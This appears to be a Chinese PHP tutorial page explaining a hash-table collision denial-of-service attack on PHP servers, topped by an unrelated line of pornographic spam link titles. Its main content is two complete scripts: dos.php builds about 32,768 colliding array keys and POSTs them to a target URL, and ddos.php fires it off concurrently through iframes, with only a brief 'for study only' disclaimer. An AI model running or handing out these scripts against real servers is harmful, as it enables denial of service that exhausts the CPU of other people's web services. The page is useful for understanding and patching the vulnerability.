乱爱性全过程免费视频/午夜毛片视频/中文字幕av三区/一级视频网址

當(dāng)前位置: 維易PHP培訓(xùn)學(xué)院 > PHP學(xué)習(xí) > 內(nèi)容正文

PHP學(xué)習(xí):PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析

作者:VEPHP   時(shí)間 2017-10-20

《PHP學(xué)習(xí):PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析》要點(diǎn):
本文介紹了PHP學(xué)習(xí):PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析,希望對(duì)您有用。如果有疑問(wèn),可以聯(lián)系我們。

本文實(shí)例分析了PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的辦法.分享給大家供大家參考.具體分析如下:PHP教程

首先聲明:本文內(nèi)容只用于研究學(xué)習(xí)使用,請(qǐng)勿用于非法行為!PHP教程

前面提到過(guò)最近爆出的hash表碰撞漏洞,包括java、python、php等在內(nèi)的很多常用語(yǔ)言均未幸免,今晚咱就來(lái)實(shí)際看看它的威力.PHP教程

攻擊原理:PHP教程

通過(guò)向目標(biāo)服務(wù)器post一組精心拼湊的數(shù)組參數(shù),到達(dá)服務(wù)端后語(yǔ)言底層處理接收到的數(shù)組參數(shù)時(shí),由于該漏洞的存在造成CPU的大量消耗,最終導(dǎo)致服務(wù)器資源耗盡.
不用什么花哨的手法,就用PHP簡(jiǎn)單實(shí)現(xiàn)下看下效果,點(diǎn)到即止.PHP教程

文件:dos.phpPHP教程

// 目標(biāo)地址 
// 只要目標(biāo)地址存在,不用管它是干嘛的 
$host = 'http://127.0.0.1/test.php';
$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
  $data .= '&array[' . $key . ']=0';
}
$ret = curl($host, ltrim($data,'&')); 
var_dump($ret); 
function curl($url, $post, $timeout = 30){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); 
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
  curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  $output = curl_exec($ch);
  if ($output === false) return false;
  $info = curl_getinfo($ch);
  $http_code = $info['http_code'];
  if ($http_code == 404) return false;
  curl_close($ch);
  return $output;
}

文件:ddos.phpPHP教程

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title>DDOS</title> 
</head> 
<body> 
<?php 
for($i=0; $i<5; $i++){//并發(fā)數(shù) 
  echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'; 
} 
?> 
</body> 
</html>

希望本文所述對(duì)大家的php程序設(shè)計(jì)有所贊助.PHP教程

歡迎參與《PHP學(xué)習(xí):PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析》討論,分享您的想法,維易PHP學(xué)院為您提供專(zhuān)業(yè)教程。

轉(zhuǎn)載請(qǐng)注明本頁(yè)網(wǎng)址:
http://www.fzlkiss.com/jiaocheng/11370.html


    標(biāo)簽: